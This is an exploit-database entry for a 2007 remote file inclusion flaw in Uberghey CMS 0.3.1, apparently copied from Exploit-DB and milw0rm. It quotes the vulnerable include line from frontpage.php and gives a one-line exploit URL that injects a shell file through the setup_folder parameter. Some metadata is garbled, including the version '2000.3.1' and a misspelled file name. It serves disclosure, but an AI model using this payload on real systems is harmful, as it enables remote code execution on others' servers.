Uberghey CMS 0.3.1 Remote Code Execution

vendor:

Uberghey CMS

by:

GolD_M (Mahmood_ali)

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Uberghey CMS

Affected Version From: 2000.3.1

Affected Version To: 2000.3.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Uberghey CMS 0.3.1 Remote Code Execution

The Uberghey CMS 0.3.1 is vulnerable to remote code execution. The vulnerability exists in the 'frontpage.php' file, specifically on line 17, where it includes a file without proper input validation. An attacker can exploit this vulnerability by injecting a specially crafted file path in the 'setup_folder' parameter, leading to the execution of arbitrary code.

Mitigation:

The vulnerability can be mitigated by ensuring proper input validation and sanitization of user-supplied input in the affected file.

Source

Exploit-DB raw data:

/###################################################################\
# Uberghey CMS 0.3.1                                                #
# =========================================================         #
# Published : 2007-01-17                                            #
# Remote: Yes                                                       #
# Site:http://switch.dl.sourceforge.net/sourceforge/uberghey/       #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.cN                                             #
# =====================================================             #
# ThanX=All My Friends-ABDULLAH00-Dr.Hail-MoHaNdKo-SilVeR_FaLCoN-Z4E#
# SpeciaL GreeTz : TrYaG-Team & 4lKaSrGoLd3N-Team                   #
\###################################################################/
/###################################################################\
# In :                                                              #
# /frontpag.php                                                     #
# LiNe:                                                             #
# /17                                                               #
# Vulnerable Code:                                                  #
# include("$setup_folder/i18n/$language/$page_id.inc");             #
# ExPlOiT :                                                         #
# /frontpage.php?setup_folder=shell.txt?                            #
#                                                                   #
#                                                                   #
#             /#######################################\             #
#             #         TrYaG.Com & DwRaT.Com         #             #
#             \#######################################/             #
\############################MAHMOOD_ALI############################/

# milw0rm.com [2007-01-17]